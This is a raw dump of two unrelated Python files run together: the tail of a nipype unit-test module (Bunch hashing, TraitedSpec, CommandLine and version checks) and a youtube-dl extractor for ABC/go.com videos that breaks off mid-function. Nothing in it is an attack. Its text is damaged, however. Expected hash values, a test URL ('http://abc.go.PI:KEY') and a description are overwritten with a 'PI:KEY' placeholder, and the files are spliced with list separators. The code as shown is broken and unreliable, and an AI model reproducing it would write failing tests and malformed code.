b.a, 1\n yield assert_equal, b.b, [2, 3]\n yield assert_equal, b.c, None\n\n\ndef test_bunch_repr():\n b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2))\n yield assert_equal, repr(b), ""Bunch(a={\'m\': 2, \'n\': 1}, b=2, c=3)""\n\n\ndef test_bunch_methods():\n b = nib.Bunch(a=2)\n b.update(a=3)\n newb = b.dictcopy()\n yield assert_equal, b.a, 3\n yield assert_equal, b.get(\'a\'), 3\n yield assert_equal, b.get(\'badkey\', \'otherthing\'), \'otherthing\'\n yield assert_not_equal, b, newb\n yield assert_equal, type(dict()), type(newb)\n yield assert_equal, newb[\'a\'], 3\n\n\ndef test_bunch_hash():\n # NOTE: Since the path to the json file is included in the Bunch,\n # the hash will be unique to each machine.\n pth = os.path.split(os.path.abspath(__file__))[0]\n json_pth = os.path.join(pth, \'realign_json.json\')\n b = nib.Bunch(infile=json_pth,\n otherthing=\'blue\',\n yat=True)\n newbdict, bhash = b._get_bunch_hash()\n yield assert_equal, bhash, \'PI:KEY\'\n # Make sure the hash stored in the json file for `infile` is correct.\n jshash = nib.md5()\n with open(json_pth, \'r\') as fp:\n jshash.update(fp.read().encode(\'utf-8\'))\n yield assert_equal, newbdict[\'infile\'][0][1], jshash.hexdigest()\n yield assert_equal, newbdict[\'yat\'], True\n\n\n# create a temp file\n# global tmp_infile, tmp_dir\n# tmp_infile = None\n# tmp_dir = None\ndef setup_file():\n # global tmp_infile, tmp_dir\n tmp_dir = tempfile.mkdtemp()\n tmp_infile = os.path.join(tmp_dir, \'foo.txt\')\n with open(tmp_infile, \'w\') as fp:\n fp.writelines([\'123456789\'])\n return tmp_infile\n\n\ndef teardown_file(tmp_dir):\n shutil.rmtree(tmp_dir)\n\n\ndef test_TraitedSpec():\n yield assert_true, nib.TraitedSpec().get_hashval()\n yield assert_equal, nib.TraitedSpec().__repr__(), \'\\n\\n\'\n\n class spec(nib.TraitedSpec):\n foo = nib.traits.Int\n goo = nib.traits.Float(usedefault=True)\n\n yield assert_equal, spec().foo, Undefined\n yield assert_equal, spec().goo, 0.0\n specfunc = lambda x: spec(hoo=x)\n yield assert_raises, nib.traits.TraitError, specfunc, 1\n infields = spec(foo=1)\n hashval = ([(\'foo\', 1), (\'goo\', \'0.0000000000\')], \'PI:KEY\')\n yield assert_equal, infields.get_hashval(), hashval\n # yield assert_equal, infields.hashval[1], hashval[1]\n yield assert_equal, infields.__repr__(), \'\\nfoo = 1\\ngoo = 0.0\\n\'\n\n\n@skip\ndef test_TraitedSpec_dynamic():\n from pickle import dumps, loads\n a = nib.BaseTraitedSpec()\n a.add_trait(\'foo\', nib.traits.Int)\n a.foo = 1\n assign_a = lambda: setattr(a, \'foo\', \'a\')\n yield assert_raises, Exception, assign_a\n pkld_a = dumps(a)\n unpkld_a = loads(pkld_a)\n assign_a_again = lambda: setattr(unpkld_a, \'foo\', \'a\')\n yield assert_raises, Exception, assign_a_again\n\n\ndef test_TraitedSpec_logic():\n class spec3(nib.TraitedSpec):\n _xor_inputs = (\'foo\', \'bar\')\n\n foo = nib.traits.Int(xor=_xor_inputs,\n desc=\'foo or bar, not both\')\n bar = nib.traits.Int(xor=_xor_inputs,\n desc=\'bar or foo, not both\')\n kung = nib.traits.Float(requires=(\'foo\',),\n position=0,\n desc=\'kung foo\')\n\n class out3(nib.TraitedSpec):\n output = nib.traits.Int\n\n class MyInterface(nib.BaseInterface):\n input_spec = spec3\n output_spec = out3\n\n myif = MyInterface()\n yield assert_raises, TypeError, setattr(myif.inputs, \'kung\', 10.0)\n myif.inputs.foo = 1\n yield assert_equal, myif.inputs.foo, 1\n set_bar = lambda: setattr(myif.inputs, \'bar\', 1)\n yield assert_raises, IOError, set_bar\n yield assert_equal, myif.inputs.foo, 1\n myif.inputs.kung = 2\n yield assert_equal, 
myif.inputs.kung, 2.0\n\n\ndef test_deprecation():\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec1(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'0.1\')\n spec_instance = DeprecationSpec1()\n set_foo = lambda: setattr(spec_instance, \'foo\', 1)\n yield assert_raises, nib.TraitError, set_foo\n yield assert_equal, len(w), 0, \'no warnings, just errors\'\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec1numeric(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'0.1\')\n spec_instance = DeprecationSpec1numeric()\n set_foo = lambda: setattr(spec_instance, \'foo\', 1)\n yield assert_raises, nib.TraitError, set_foo\n yield assert_equal, len(w), 0, \'no warnings, just errors\'\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec2(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'100\', new_name=\'bar\')\n spec_instance = DeprecationSpec2()\n set_foo = lambda: setattr(spec_instance, \'foo\', 1)\n yield assert_raises, nib.TraitError, set_foo\n yield assert_equal, len(w), 0, \'no warnings, just errors\'\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec3(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'1000\', new_name=\'bar\')\n bar = nib.traits.Int()\n spec_instance = DeprecationSpec3()\n not_raised = True\n try:\n spec_instance.foo = 1\n except nib.TraitError:\n not_raised = False\n yield assert_true, not_raised\n yield assert_equal, len(w), 1, \'deprecated warning 1 %s\' % [w1.message for w1 in w]\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec3(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'1000\', new_name=\'bar\')\n bar = nib.traits.Int()\n spec_instance = DeprecationSpec3()\n not_raised = True\n try:\n spec_instance.foo = 1\n except nib.TraitError:\n not_raised = False\n yield assert_true, not_raised\n yield assert_equal, spec_instance.foo, Undefined\n yield assert_equal, spec_instance.bar, 1\n yield assert_equal, len(w), 1, \'deprecated warning 2 %s\' % [w1.message for w1 in w]\n\n\ndef test_namesource():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec2(nib.CommandLineInputSpec):\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=2)\n doo = nib.File(exists=True, argstr=""%s"", position=1)\n goo = traits.Int(argstr=""%d"", position=4)\n poo = nib.File(name_source=[\'goo\'], hash_files=False, argstr=""%s"", position=3)\n\n class TestName(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec2\n testobj = TestName()\n testobj.inputs.doo = tmp_infile\n testobj.inputs.goo = 99\n yield assert_true, \'%s_generated\' % nme in testobj.cmdline\n testobj.inputs.moo = ""my_%s_template""\n yield assert_true, \'my_%s_template\' % nme in testobj.cmdline\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_chained_namesource():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec2(nib.CommandLineInputSpec):\n doo = nib.File(exists=True, argstr=""%s"", position=1)\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=2, name_template=\'%s_mootpl\')\n 
poo = nib.File(name_source=[\'moo\'], hash_files=False,\n argstr=""%s"", position=3)\n\n class TestName(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec2\n\n testobj = TestName()\n testobj.inputs.doo = tmp_infile\n res = testobj.cmdline\n yield assert_true, \'%s\' % tmp_infile in res\n yield assert_true, \'%s_mootpl \' % nme in res\n yield assert_true, \'%s_mootpl_generated\' % nme in res\n\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_cycle_namesource1():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec3(nib.CommandLineInputSpec):\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=1, name_template=\'%s_mootpl\')\n poo = nib.File(name_source=[\'moo\'], hash_files=False,\n argstr=""%s"", position=2)\n doo = nib.File(name_source=[\'poo\'], hash_files=False,\n argstr=""%s"", position=3)\n\n class TestCycle(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec3\n\n # Check that an exception is raised\n to0 = TestCycle()\n not_raised = True\n try:\n to0.cmdline\n except nib.NipypeInterfaceError:\n not_raised = False\n yield assert_false, not_raised\n\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_cycle_namesource2():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec3(nib.CommandLineInputSpec):\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=1, name_template=\'%s_mootpl\')\n poo = nib.File(name_source=[\'moo\'], hash_files=False,\n argstr=""%s"", position=2)\n doo = nib.File(name_source=[\'poo\'], hash_files=False,\n argstr=""%s"", position=3)\n\n class TestCycle(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec3\n\n # Check that loop can be broken by setting one of the inputs\n to1 = TestCycle()\n to1.inputs.poo = tmp_infile\n\n not_raised = True\n try:\n res = to1.cmdline\n except nib.NipypeInterfaceError:\n not_raised = False\n print(res)\n\n yield assert_true, not_raised\n yield assert_true, \'%s\' % tmp_infile in res\n yield assert_true, \'%s_generated\' % nme in res\n yield assert_true, \'%s_generated_mootpl\' % nme in res\n\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef checknose():\n """"""check version of nose for known incompatability""""""\n mod = __import__(\'nose\')\n if mod.__versioninfo__[1] <= 11:\n return 0\n else:\n return 1\n\n\n@skipif(checknose)\ndef test_TraitedSpec_withFile():\n tmp_infile = setup_file()\n tmpd, nme = os.path.split(tmp_infile)\n yield assert_true, os.path.exists(tmp_infile)\n\n class spec2(nib.TraitedSpec):\n moo = nib.File(exists=True)\n doo = nib.traits.List(nib.File(exists=True))\n infields = spec2(moo=tmp_infile, doo=[tmp_infile])\n hashval = infields.get_hashval(hash_method=\'content\')\n yield assert_equal, hashval[1], \'PI:KEY\'\n teardown_file(tmpd)\n\n\n@skipif(checknose)\ndef test_TraitedSpec_withNoFileHashing():\n tmp_infile = setup_file()\n tmpd, nme = os.path.split(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n yield assert_true, os.path.exists(tmp_infile)\n\n class spec2(nib.TraitedSpec):\n moo = nib.File(exists=True, hash_files=False)\n doo = nib.traits.List(nib.File(exists=True))\n infields = spec2(moo=nme, doo=[tmp_infile])\n hashval = infields.get_hashval(hash_method=\'content\')\n yield assert_equal, hashval[1], \'PI:KEY\'\n\n class spec3(nib.TraitedSpec):\n moo = nib.File(exists=True, name_source=""doo"")\n doo = nib.traits.List(nib.File(exists=True))\n infields = 
spec3(moo=nme, doo=[tmp_infile])\n hashval1 = infields.get_hashval(hash_method=\'content\')\n\n class spec4(nib.TraitedSpec):\n moo = nib.File(exists=True)\n doo = nib.traits.List(nib.File(exists=True))\n infields = spec4(moo=nme, doo=[tmp_infile])\n hashval2 = infields.get_hashval(hash_method=\'content\')\n\n yield assert_not_equal, hashval1[1], hashval2[1]\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_Interface():\n yield assert_equal, nib.Interface.input_spec, None\n yield assert_equal, nib.Interface.output_spec, None\n yield assert_raises, NotImplementedError, nib.Interface\n yield assert_raises, NotImplementedError, nib.Interface.help\n yield assert_raises, NotImplementedError, nib.Interface._inputs_help\n yield assert_raises, NotImplementedError, nib.Interface._outputs_help\n yield assert_raises, NotImplementedError, nib.Interface._outputs\n\n class DerivedInterface(nib.Interface):\n def __init__(self):\n pass\n\n nif = DerivedInterface()\n yield assert_raises, NotImplementedError, nif.run\n yield assert_raises, NotImplementedError, nif.aggregate_outputs\n yield assert_raises, NotImplementedError, nif._list_outputs\n yield assert_raises, NotImplementedError, nif._get_filecopy_info\n\n\ndef test_BaseInterface():\n yield assert_equal, nib.BaseInterface.help(), None\n yield assert_equal, nib.BaseInterface._get_filecopy_info(), []\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n goo = nib.traits.Int(desc=\'a random int\', mandatory=True)\n moo = nib.traits.Int(desc=\'a random int\', mandatory=False)\n hoo = nib.traits.Int(desc=\'a random int\', usedefault=True)\n zoo = nib.File(desc=\'a file\', copyfile=False)\n woo = nib.File(desc=\'a file\', copyfile=True)\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class DerivedInterface(nib.BaseInterface):\n input_spec = InputSpec\n\n yield assert_equal, DerivedInterface.help(), None\n yield assert_true, \'moo\' in \'\'.join(DerivedInterface._inputs_help())\n yield assert_equal, DerivedInterface()._outputs(), None\n yield assert_equal, DerivedInterface._get_filecopy_info()[0][\'key\'], \'woo\'\n yield assert_true, DerivedInterface._get_filecopy_info()[0][\'copy\']\n yield assert_equal, DerivedInterface._get_filecopy_info()[1][\'key\'], \'zoo\'\n yield assert_false, DerivedInterface._get_filecopy_info()[1][\'copy\']\n yield assert_equal, DerivedInterface().inputs.foo, Undefined\n yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs\n yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None\n yield assert_raises, ValueError, DerivedInterface().run\n yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run\n\n class DerivedInterface2(DerivedInterface):\n output_spec = OutputSpec\n\n def _run_interface(self, runtime):\n return runtime\n\n yield assert_equal, DerivedInterface2.help(), None\n yield assert_equal, DerivedInterface2()._outputs().foo, Undefined\n yield assert_raises, NotImplementedError, DerivedInterface2(goo=1).run\n\n nib.BaseInterface.input_spec = None\n yield assert_raises, Exception, nib.BaseInterface\n\ndef test_BaseInterface_load_save_inputs():\n tmp_dir = tempfile.mkdtemp()\n tmp_json = os.path.join(tmp_dir, \'settings.json\')\n\n class InputSpec(nib.TraitedSpec):\n input1 = nib.traits.Int()\n input2 = nib.traits.Float()\n input3 = nib.traits.Bool()\n input4 = nib.traits.Str()\n\n class DerivedInterface(nib.BaseInterface):\n input_spec = InputSpec\n\n def __init__(self, **inputs):\n 
super(DerivedInterface, self).__init__(**inputs)\n\n inputs_dict = {\'input1\': 12, \'input3\': True,\n \'input4\': \'some string\'}\n bif = DerivedInterface(**inputs_dict)\n bif.save_inputs_to_json(tmp_json)\n bif2 = DerivedInterface()\n bif2.load_inputs_from_json(tmp_json)\n yield assert_equal, bif2.inputs.get_traitsfree(), inputs_dict\n\n bif3 = DerivedInterface(from_file=tmp_json)\n yield assert_equal, bif3.inputs.get_traitsfree(), inputs_dict\n\n inputs_dict2 = inputs_dict.copy()\n inputs_dict2.update({\'input4\': \'some other string\'})\n bif4 = DerivedInterface(from_file=tmp_json, input4=inputs_dict2[\'input4\'])\n yield assert_equal, bif4.inputs.get_traitsfree(), inputs_dict2\n\n bif5 = DerivedInterface(input4=inputs_dict2[\'input4\'])\n bif5.load_inputs_from_json(tmp_json, overwrite=False)\n yield assert_equal, bif5.inputs.get_traitsfree(), inputs_dict2\n\n bif6 = DerivedInterface(input4=inputs_dict2[\'input4\'])\n bif6.load_inputs_from_json(tmp_json)\n yield assert_equal, bif6.inputs.get_traitsfree(), inputs_dict\n\n # test get hashval in a complex interface\n from nipype.interfaces.ants import Registration\n settings = example_data(example_data(\'smri_ants_registration_settings.json\'))\n with open(settings) as setf:\n data_dict = json.load(setf)\n\n tsthash = Registration()\n tsthash.load_inputs_from_json(settings)\n yield assert_equal, {}, check_dict(data_dict, tsthash.inputs.get_traitsfree())\n\n tsthash2 = Registration(from_file=settings)\n yield assert_equal, {}, check_dict(data_dict, tsthash2.inputs.get_traitsfree())\n\n _, hashvalue = tsthash.inputs.get_hashval(hash_method=\'timestamp\')\n yield assert_equal, \'ec5755e07287e04a4b409e03b77a517c\', hashvalue\n\ndef test_input_version():\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n obj = DerivedInterface1()\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n config.set(\'execution\', \'stop_on_unknown_version\', True)\n yield assert_raises, Exception, obj._check_version_requirements, obj.inputs\n\n config.set_default_config()\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.8\'\n obj = DerivedInterface1()\n obj.inputs.foo = 1\n yield assert_raises, Exception, obj._check_version_requirements\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.10\'\n obj = DerivedInterface1()\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.9\'\n obj = DerivedInterface1()\n obj.inputs.foo = 1\n not_raised = True\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', max_ver=\'0.7\')\n\n class DerivedInterface2(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.8\'\n obj = DerivedInterface2()\n obj.inputs.foo = 1\n yield assert_raises, Exception, obj._check_version_requirements\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', max_ver=\'0.9\')\n\n class 
DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n _version = \'0.9\'\n obj = DerivedInterface1()\n obj.inputs.foo = 1\n not_raised = True\n yield assert_not_raises, obj._check_version_requirements, obj.inputs\n\n\ndef test_output_version():\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.9\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n output_spec = OutputSpec\n _version = \'0.10\'\n obj = DerivedInterface1()\n yield assert_equal, obj._check_version_requirements(obj._outputs()), []\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.11\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n output_spec = OutputSpec\n _version = \'0.10\'\n obj = DerivedInterface1()\n yield assert_equal, obj._check_version_requirements(obj._outputs()), [\'foo\']\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\', min_ver=\'0.11\')\n\n class DerivedInterface1(nib.BaseInterface):\n input_spec = InputSpec\n output_spec = OutputSpec\n _version = \'0.10\'\n\n def _run_interface(self, runtime):\n return runtime\n\n def _list_outputs(self):\n return {\'foo\': 1}\n obj = DerivedInterface1()\n yield assert_raises, KeyError, obj.run\n\n\ndef test_Commandline():\n yield assert_raises, Exception, nib.CommandLine\n ci = nib.CommandLine(command=\'which\')\n yield assert_equal, ci.cmd, \'which\'\n yield assert_equal, ci.inputs.args, Undefined\n ci2 = nib.CommandLine(command=\'which\', args=\'ls\')\n yield assert_equal, ci2.cmdline, \'which ls\'\n ci3 = nib.CommandLine(command=\'echo\')\n ci3.inputs.environ = {\'MYENV\': \'foo\'}\n res = ci3.run()\n yield assert_equal, res.runtime.environ[\'MYENV\'], \'foo\'\n yield assert_equal, res.outputs, None\n\n class CommandLineInputSpec1(nib.CommandLineInputSpec):\n foo = nib.Str(argstr=\'%s\', desc=\'a str\')\n goo = nib.traits.Bool(argstr=\'-g\', desc=\'a bool\', position=0)\n hoo = nib.traits.List(argstr=\'-l %s\', desc=\'a list\')\n moo = nib.traits.List(argstr=\'-i %d...\', desc=\'a repeated list\',\n position=-1)\n noo = nib.traits.Int(argstr=\'-x %d\', desc=\'an int\')\n roo = nib.traits.Str(desc=\'not on command line\')\n soo = nib.traits.Bool(argstr=""-soo"")\n nib.CommandLine.input_spec = CommandLineInputSpec1\n ci4 = nib.CommandLine(command=\'cmd\')\n ci4.inputs.foo = \'foo\'\n ci4.inputs.goo = True\n ci4.inputs.hoo = [\'a\', \'b\']\n ci4.inputs.moo = [1, 2, 3]\n ci4.inputs.noo = 0\n ci4.inputs.roo = \'hello\'\n ci4.inputs.soo = False\n cmd = ci4._parse_inputs()\n yield assert_equal, cmd[0], \'-g\'\n yield assert_equal, cmd[-1], \'-i 1 -i 2 -i 3\'\n yield assert_true, \'hello\' not in \' \'.join(cmd)\n yield assert_true, \'-soo\' not in \' \'.join(cmd)\n ci4.inputs.soo = True\n cmd = ci4._parse_inputs()\n yield assert_true, \'-soo\' in \' \'.join(cmd)\n\n class CommandLineInputSpec2(nib.CommandLineInputSpec):\n foo = nib.File(argstr=\'%s\', desc=\'a str\', genfile=True)\n nib.CommandLine.input_spec = CommandLineInputSpec2\n ci5 = nib.CommandLine(command=\'cmd\')\n yield assert_raises, NotImplementedError, ci5._parse_inputs\n\n class DerivedClass(nib.CommandLine):\n input_spec = CommandLineInputSpec2\n\n def _gen_filename(self, name):\n 
return \'filename\'\n\n ci6 = DerivedClass(command=\'cmd\')\n yield assert_equal, ci6._parse_inputs()[0], \'filename\'\n nib.CommandLine.input_spec = nib.CommandLineInputSpec\n\n\ndef test_Commandline_environ():\n from nipype import config\n config.set_default_config()\n ci3 = nib.CommandLine(command=\'echo\')\n res = ci3.run()\n yield assert_equal, res.runtime.environ[\'DISPLAY\'], \':1\'\n config.set(\'execution\', \'display_variable\', \':3\')\n res = ci3.run()\n yield assert_false, \'DISPLAY\' in ci3.inputs.environ\n yield assert_equal, res.runtime.environ[\'DISPLAY\'], \':3\'\n ci3.inputs.environ = {\'DISPLAY\': \':2\'}\n res = ci3.run()\n yield assert_equal, res.runtime.environ[\'DISPLAY\'], \':2\'\n\n\ndef test_CommandLine_output():\n tmp_infile = setup_file()\n tmpd, name = os.path.split(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n yield assert_true, os.path.exists(tmp_infile)\n ci = nib.CommandLine(command=\'ls -l\')\n ci.inputs.terminal_output = \'allatonce\'\n res = ci.run()\n yield assert_equal, res.runtime.merged, \'\'\n yield assert_true, name in res.runtime.stdout\n ci = nib.CommandLine(command=\'ls -l\')\n ci.inputs.terminal_output = \'file\'\n res = ci.run()\n yield assert_true, \'stdout.nipype\' in res.runtime.stdout\n yield assert_true, isinstance(res.runtime.stdout, (str, bytes))\n ci = nib.CommandLine(command=\'ls -l\')\n ci.inputs.terminal_output = \'none\'\n res = ci.run()\n yield assert_equal, res.runtime.stdout, \'\'\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_true, \'stdout.nipype\' in res.runtime.stdout\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_global_CommandLine_output():\n tmp_infile = setup_file()\n tmpd, name = os.path.split(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_true, name in res.runtime.stdout\n yield assert_true, os.path.exists(tmp_infile)\n nib.CommandLine.set_default_terminal_output(\'allatonce\')\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_equal, res.runtime.merged, \'\'\n yield assert_true, name in res.runtime.stdout\n nib.CommandLine.set_default_terminal_output(\'file\')\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_true, \'stdout.nipype\' in res.runtime.stdout\n nib.CommandLine.set_default_terminal_output(\'none\')\n ci = nib.CommandLine(command=\'ls -l\')\n res = ci.run()\n yield assert_equal, res.runtime.stdout, \'\'\n os.chdir(pwd)\n teardown_file(tmpd)\n\ndef assert_not_raises(fn, *args, **kwargs):\n fn(*args, **kwargs)\n return True\n\ndef check_dict(ref_dict, tst_dict):\n """"""Compare dictionaries of inputs and and those loaded from json files""""""\n def to_list(x):\n if isinstance(x, tuple):\n x = list(x)\n\n if isinstance(x, list):\n for i, xel in enumerate(x):\n x[i] = to_list(xel)\n\n return x\n\n failed_dict = {}\n for key, value in list(ref_dict.items()):\n newval = to_list(tst_dict[key])\n if newval != value:\n failed_dict[key] = (value, newval)\n return failed_dict\n\n', '# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom .adobepass import AdobePassIE\nfrom ..utils import (\n int_or_none,\n determine_ext,\n parse_age_limit,\n urlencode_postdata,\n ExtractorError,\n)\n\n\nclass GoIE(AdobePassIE):\n _SITE_INFO = {\n \'abc\': {\n \'brand\': \'001\',\n \'requestor_id\': \'ABC\',\n },\n \'freeform\': {\n \'brand\': \'002\',\n \'requestor_id\': \'ABCFamily\',\n },\n \'watchdisneychannel\': {\n \'brand\': \'004\',\n 
\'requestor_id\': \'Disney\',\n },\n \'watchdisneyjunior\': {\n \'brand\': \'008\',\n \'requestor_id\': \'DisneyJunior\',\n },\n \'watchdisneyxd\': {\n \'brand\': \'009\',\n \'requestor_id\': \'DisneyXD\',\n }\n }\n _VALID_URL = r\'https?://(?:(?P%s)\\.)?go\\.com/(?:[^/]+/)*(?:vdka(?P\\w+)|season-\\d+/\\d+-(?P[^/?#]+))\' % \'|\'.join(_SITE_INFO.keys())\n _TESTS = [{\n \'url\': \'http://abc.go.PI:KEY\',\n \'info_dict\': {\n \'id\': \'0_g86w5onx\',\n \'ext\': \'mp4\',\n \'title\': \'Sneak Peek: Language Arts\',\n \'description\': \'PI:KEY\',\n },\n \'params\': {\n # m3u8 download\n \'skip_download\': True,\n },\n }, {\n \'url\': \'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601\',\n \'only_matching\': True,\n }]\n\n def _real_extract(self, url):\n sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()\n if not video_id:\n webpage = self._download_webpage(url, display_id)\n video_id = self._search_regex(\n # There may be inner quotes, e.g. data-video-id=""\'VDKA3609139\'""\n # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood\n r\'data-video-id=[""\\\']*VDKA(\\w+)\', webpage, \'video id\')\n site_info = self._SITE_INFO[sub_domain]\n brand = site_info[\'brand\']\n video_data = self._download_json(\n \'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json\' % (brand, video_id),\n video_id)[\'video\'][0]\n title = video_data[\'title\']\n\n formats = []\n for asset in video_data.get(\'assets\', {}).get(\'asset\', []):\n asset_url = asset.get(\'value\')\n if not asset_url:\n continue\n format_id = asset.get(\'format\')\n ext = determine_ext(asset_url)\n if ext == \'m3u8\':\n video_type = video_data.get(\'type\')\n data = {\n \'video_id\': video_data[\'id\'],\n \'video_type\': video_type,\n \'brand\': brand,\n \'device\': \'001\',\n }\n if video_data.get(\'accesslevel\') == \'1\':\n requestor_id = site_info[\'requestor_id\']\n resource = self._get_mvpd_resource(\n requestor_id, title, video_id, None)\n auth = self._extract_mvpd_auth(\n url, video_id, requestor_id, resource)\n data.update({\n \'token\': auth,\n \'token_type\': \'ap\',\n \'adobe_requestor_id\': requestor_id,\n })\n else:\n self._initialize_geo_bypass([\'US\'])\n entitlement = self._download_json(\n \'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json\',\n video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())\n errors = entitlement.get(\'errors\', {}).get(\'errors\', [])\n if errors:\n for error in errors:\n if error.get(\'code\') == 1002:\n self.raise_geo_restricted(\n error[\'message\'], countries=[\'US\'])\n error_message = \', \'.join([error[\'message\'] for error in errors])\n raise ExtractorError(\'%s said: %s\' % (self.IE_NAME, error_message), expected=True)\n asset_url += \'?\' + entitlement[\'uplynkData\'][\'sessionKey\']\n formats.extend(self._extract_m3u8_formats(\n asset_url, video_id, \'mp4\', m3u8_id=format_id or \'hls\', fatal=False))\n else:\n f = {\n \'format_id\': format_id,\n \'url\': asset_url,\n \'ext\': ext,\n }\n if re.search(r\'(?:/mp4/source/|_source\\.mp4)\', asset_url):\n f.update({\n \'format_id\': (\'%s-\' % format_id if format_id else \'\') + \'SOURCE\',\n \'preference\': 1,\n })\n else:\n mobj = re.search(r\'/(\\d+)x(\\d+)/\', asset_url)\n if mobj:\n height = int(mobj.group(2))\n f.update({\n \'format_id\': (\'%s-\' % format_id if format_id else \'\') + \'%dP\' % height,\n \'width\': int(mobj.group(1)),\n \'height\': height,\n 
